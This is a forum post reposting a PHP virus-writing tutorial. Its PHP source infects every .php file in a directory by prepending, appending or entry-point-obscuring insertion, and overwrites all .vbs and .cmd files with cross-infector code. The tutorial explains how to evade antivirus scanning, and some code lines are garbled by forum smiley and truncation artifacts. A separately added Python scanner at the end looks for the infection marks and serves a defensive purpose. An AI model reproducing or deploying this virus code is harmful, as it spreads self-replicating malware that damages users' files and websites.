Prva Gimnazija Zagreb Forum
PHP Virus Writing Guide part 1



Post by zekton on Fri Apr 17, 2009 1:02 am

******

0) Intro Words

1) File infection
a) Prepending
b) Appending
c) Cross Infection
i) VBS infection
ii) JS infection
iii) CMD infection
d) Entry Point Obscuring
i) Include the virus after a command
ii) Using a function of the victim

2) Encryption
a) Changing virus to ASCII
b) Using an intern decryption function
c) Using a changed character string

3) Polymorphism
a) Adding Trash
b) Change Variable Names
c) Number Changing

4) Other Thoughts
a) Find more files
b) Changing the commands

5) Last Words



0) Intro Words

PHP, abbreviated from 'Hypertext Preprocessor', is a very common script language
for the world-wide-web. You're able to do nearly everything internet
related with that language. That means you're also able to make viruses
for it. The first virus for PHP, PHP.Pirus by MaskBits/VXI, was done in
October 2000, and was released in 29A#5. It was no real virus, but rather
a companion. It writes to every PHP file in the current directory a line
which lets the victim run the virus. But the host doesn't contain the virus.
After searching for something about PHP viruses I found out that there is no
high-tech PHP virus out so far, because all the viruses I could find are rips
of PHP.Pirus (using the same principle). That was my inspiration in writing
such an article. I wanted to make something totally new, and I guess I had
success. I tested every source with PHP 4.3.3, and everything worked fine.
Now go on reading this and learn something about PHP viruses!




1) File Infection

That's maybe the most important thing when you want to make a PHP virus,
therefore I want to explain to you how you can infect files with PHP. It should
be no problem to understand the examples, because I tried to make them as
simple as possible. When the article was written (autumn 2003), there was
no real file infector out there. The only interesting PHP virus so far is
MaskBits' PHP.Pirus, which doesn't infect files, but uses the command 'include'
so that the virus is executed in every PHP file in the current dir. You may think
'Why does he tell me this?'. I don't know, just for fun. Now let me explain
to you how to infect files.



a) Prepending

A prepender copies its code in front of the victim's code, therefore it will
be executed before the victim. That's the main idea of this kind of infection.
But there are some other important things you have to note: To get the virus
out of the file, you need some information about where the virus is. In my
example the virus uses the first 391 bytes. The next important thing is that you
must not infect a file two times. What to do against that? Check if the file
is already infected. In the following example the virus searches in the first
13 bytes (in an infected file it's this code: ' 'SPTH'. If yes, the file won't be infected. OK, I think you understood. Now
let's look at the PHP Prepender Virus example:

- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - - - -
$string=fread(fopen(__FILE__,'r'), 391);
$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
if (!strstr(fread($victim, 13), 'SPTH'))
{
rewind($victim);
fwrite($victim, $string.fread($victim, filesize($file))Wink;
}
fclose($victim);
}
}
closedir($curdir);
?>
- - - - - - - - - - - - - [ PHP Prepender Virus Example ] - - - - - - - - - - - - -

As this is a really easy virus, you should understand it quickly while looking
at it. Now I'm going to give you the most important things the example does:

--> Reading the first 391 bytes (which is exactly the virus size)

--> Searches for every .PHP file in the current directory

--> If not infected, reading the victim







b) Appending

An Appender is a virus which copies itself after the victim file. It's
really easy to make one. You just have to search for the last php-part (or
just make an infection-mark at the beginning of the virus). Then you read till
the end, and you have your virus-file. The rest should be clear: Search a
victim, check if it's not infected and copy the virus-body to the end of the
file. I made an example for that, as you might think. The exact explanation
will be at the end after the code.

- - - - - - - - - - - - - [ PHP Appender Virus Example ] - - - - - - - - - - - - -
$string='$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
if (!strstr(fread($victim, filesize($file)), 'SPTH'))
{
fwrite($victim, $string);
}
fclose($victim);
}
}
closedir($curdir);
?>
- - - - - - - - - - - - - [ PHP Appender Virus Example ] - - - - - - - - - - - - -

I've already explained how the principle works. Now I'll explain my example to you:

--> Opens the infected file and saves the virus body (searching for 'SPTH', and
saving the rest of the file)

--> Searches for every php-file in the current directory.

--> Checks if it's not infected (searches for the infection mark 'SPTH' anywhere in
the file. If not found: Not infected)

--> Copies the virus body to the file







c) Cross Infection

Cross Infection means infecting more than one file extension. That's really
useful, because the virus will spread much faster. That was my inspiration
in writing this. I found some nice ways to infect other file-formats,
therefore I want to show them to you. The biggest problem while coding these
things was that you can't execute a .php file directly, but only with an Internet
Browser. Fortunately Microsoft makes it possible to open the Internet Explorer
very easily.


i) VBS infection

It's really easy to infect a vbs-file, because the only important thing,
if you want to write such a cross infector, is that you don't have to use
the sign [" = chr(34) ], because VisualBasicScript uses it for strings, and
since our whole code is a string in the VBS-file, there would be an error.
Now look at the example and try to understand it (shouldn't be too difficult,
because I made it very easy to read).

- - - - - - - - - - - - - [ Cross Infector - VBS ] - - - - - - - - - - - - -
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$vbscode='set fso=Wscript.CreateObject('.chr(34).'scripting.FileSystemObject'.chr(34).')'.chr(13).chr(10);
$vbscode.='set shell=Wscript.CreateObject('.chr(34).'Wscript.Shell'.chr(34).')'.chr(13).chr(10);
$vbscode.='set virus=fso.CreateTextFile('.chr(34).'index.htm'.chr(34).')'.chr(13).chr(10);
while ($string && $string!='?>')
{
$vbscode.='virus.WriteLine('.chr(34).$string.chr(34).')'.chr(13).chr(10);
$string=strtok(chr(13).chr(10));
}
$vbscode.='virus.WriteLine('.chr(34).'?';
$vbscode.='>'.chr(34).')'.chr(13).chr(10);
$vbscode.='virus.Close()'.chr(13).chr(10);
$vbscode.='shell.Run '.chr(34).'index.htm'.chr(34);
$directory=opendir('.');
while ($file = readdir($directory))
{
if (strstr($file, '.vbs'))
{
fwrite(fopen($file, 'w'), $vbscode);
}
}
closedir($directory);
?>
- - - - - - - - - - - - - [ Cross Infector - VBS ] - - - - - - - - - - - - -

It should be totally easy to understand this example. Anyway, I'll give
you the main ideas of the little code:

--> Splits the php-code (=virus) into lines [chr(13).chr(10)]

--> Makes a vbs code, which generates a new HTM-file containing the virus

--> Adds every line to the VBS (as string, so it will be written to the
HTM-file, which will be generated by the VBS [?!?! :D])

--> After finishing the VBS-code, it searches for every .VBS in the current
directory and overwrites it with the code, which we made before.







ii) JS infection

Infecting a JavaScript file is nearly the same as infecting a VBS file, therefore
I won't give you an example. The reason for this is that we're using Wscript in
VBS and JS. The only thing you have to do is to change the 'set' to 'var', and the
'.vbs' to '.js', but I guess you know that :D. I tried it, and it worked fine.







iii) CMD infection

This was the most difficult file extension which I made for this article. The
reason is easy to explain: CMD = Batch for WinNT/00/XP = DOS. And as you know
you are NOT allowed to use any '>', '<' or '&' in a DOS-string. But I solved the
problem, as you may imagine. I used the characters in every string instead of
the real signs. Then I had 2 more problems: The beginning and the end of the PHP code,
where we MUST write '<' or '>'. So I thought about that, and suddenly an idea came
to my mind: I'll use a JavaScript file to write the first and the last line to
the .htm file. And since I have to use a script anyway for starting the Internet
Explorer (to run the PHP-code - DOS can't open an Internet Browser), I used that file.
The result of my coding is the following file :D. I'll explain the main ideas more
exactly after the source.

- - - - - - - - - - - - - [ Cross Infector - BAT ] - - - - - - - - - - - - -
$string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
$string=strtok(chr(13).chr(10));
$cmdcode='cls'.chr(13).chr(10).'@echo off'.chr(13).chr(10).'del index.html'.chr(13).chr(10);
while ($string{0}!='?')
{
$cmdcode.='echo '.$string.chr(62).chr(62).'index.html'.chr(13).chr(10);
$string=strtok(chr(13).chr(10));
}
$cmdcode.='echo var fso=Wscript.CreateObject("scripting.FileSystemObject");'.chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo var shell=Wscript.CreateObject("Wscript.Shell");'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo all=fso.OpenTextFile("index.html").ReadAll();'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a=fso.OpenTextFile("index.html",2);'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a.Write(String.fromCharCode(60,63,112,104,112,13,10)+all+String.fromCharCode(13,10,63,62));'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo a.Close();'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='echo shell.Run("index.html");'.chr(62).chr(62).' file.js'.chr(13).chr(10);
$cmdcode.='cscript file.js';

$directory=opendir('.');
while ($file = readdir($directory))
{
if (strstr($file, '.cmd'))
{
fwrite(fopen($file, 'w'), $cmdcode);
}
}
closedir($directory);
?>
- - - - - - - - - - - - - [ Cross Infector - BAT ] - - - - - - - - - - - - -

Now the short explanation of the code:

--> Reads the whole file content (the virus), and splits it into lines

--> Makes the .CMD code, which doesn't contain any '>', '<' or '&' (that
was the problem I wrote about before)

--> Adds a JavaScript code to the .CMD code, so the first and the last lines
('') will be added to the new .htm file.

--> Adds a code to the .CMD code, which runs the Internet Explorer

--> Overwrites every .CMD file in the current directory with the CMD-code.







d) Entry Point Obscuring

This is a really important technique in virus-writing. Maybe some of you
don't know what EPO exactly is. So I'll explain it to you: An AV-program searches
in most cases at some static offsets for the virus (maybe at the begin or
at the begin). To fool them, we have to use a variable address of the virus,
and not use any jump or call to the virus at a static address. How could we
do this? I'll show you a short 'graphic'. At this point I want to thank
SnakeByte for his Perl-EPO article [released in 29a#6] for the idea of how
to make an EPO virus in a script language. So, here is the graphic:

[ part of the victim file ]
information about the address
read xxx lines of the virus
open PHP file
read yyy lines
insert the virus
read rest
close PHP file
[ rest of the victim file ]

Now we have another problem: Where to include the virus-code in the host-file?
SnakeByte did it by searching for ';', which is the end of a Perl command. As
you might know, PHP statements also end with a ';'. Then I thought about
another way, which could also be done, since that technique could be destruction
of the victim-file. Then I got an idea: including the code in a function.
How exactly I mean this, I'll show you after the ';'-example.


i) Include the virus after a command

As I already told you, this idea comes from SnakeByte. To include a virus
after a command, you have to search for a ';', which is the end of every
PHP statement. That seems to be everything. Now let's have a look at the
example for this EPO technique.


- - - - - - - - - - - - - [ EPO virus - Type I ] - - - - - - - - - - - - -
$ln=16;
$filehandle=fopen(__FILE__,'r');
srand((double)microtime()*1000000);
fseek($filehandle, $ln);
$content=fread($filehandle, 987);
fclose($filehandle);
$curdir=opendir('.');
while ($file = readdir($curdir))
{
if (strstr($file, '.php'))
{
$victim=fopen($file, 'r+');
$vicont=fread($victim, filesize($file));
if (!strstr($vicont, 'SPTH'))
{
$possible=0; $c=0;
while($c {
if($vicont{$c}.$vicont{$c+1}.$vicont{$c+2}==chr(59).chr(13).chr(10)) { $possible++;}
$c++;
}
$which=rand(1,$possible); $c=0; $i=0;
while($which)
{
if($vicont{$c}.$vicont{$c+1}.$vicont{$c+2}==chr(59).chr(13).chr(10)) { $which--; }
$c++;
}
rewind($victim);
$a=fread($victim, $c); $b=fread($victim, filesize($file));
fclose($victim);
fwrite(fopen($file, 'w'), $a.chr(13).chr(10).'$ln='.$c.';'.chr(13).chr(10).$content.chr(13).chr(10).$b);
}
}
}
?>
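Defender-side counterpart, added here and not part of the original guide or the post: a scanner that looks for the traces the prepender, appender and EPO examples above leave in a PHP file, namely the 'SPTH' mark (in the first 13 bytes for the prepender, anywhere for the appender) and the inserted '$ln=<offset>;' line of the EPO variant. The function names, the regular expression and the sample files are my own constructions.

```python
import os
import re

# Infection mark named in the guide; the prepender checks only the first
# 13 bytes of a file for it, the appender checks the whole file.
MARKER = b"SPTH"
HEADER_BYTES = 13
# The EPO example writes a line '$ln=<offset>;' directly before the virus body.
EPO_LINE = re.compile(rb"^\$ln=\d+;\r?$", re.MULTILINE)


def classify_php(content: bytes) -> list[str]:
    """Return which of the guide's infection traces this PHP source shows."""
    findings = []
    if MARKER in content[:HEADER_BYTES]:
        findings.append("prepender-marker")
    elif MARKER in content:
        findings.append("appender-marker")
    if EPO_LINE.search(content):
        findings.append("epo-offset-line")
    return findings


def scan_directory(path: str) -> dict[str, list[str]]:
    """Walk path and map each .php file with findings to its findings."""
    hits = {}
    for root, _dirs, files in os.walk(path):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(root, name)
            with open(full, "rb") as fh:
                findings = classify_php(fh.read())
            if findings:
                hits[os.path.relpath(full, path)] = findings
    return hits


# Constructed sample contents (not real infected files), one per case.
SAMPLES = {
    "clean.php": b"<?php\r\necho 'hello';\r\n?>",
    "prepended.php": b"<?php //SPTH\r\n$string=0;\r\n?><?php\r\necho 'hello';\r\n?>",
    "appended.php": b"<?php\r\necho 'hello';\r\n?><?php //SPTH\r\n$string=0;\r\n?>",
    "epo.php": b"<?php\r\n$x=1;\r\n$ln=16;\r\n// body\r\n$y=2;\r\n?>",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, classify_php(body) or ["clean"])
```

Run scan_directory() against a web root to get only the files that carry one of the traces; the mark check is a string match, so renamed marks or other variants will not be reported.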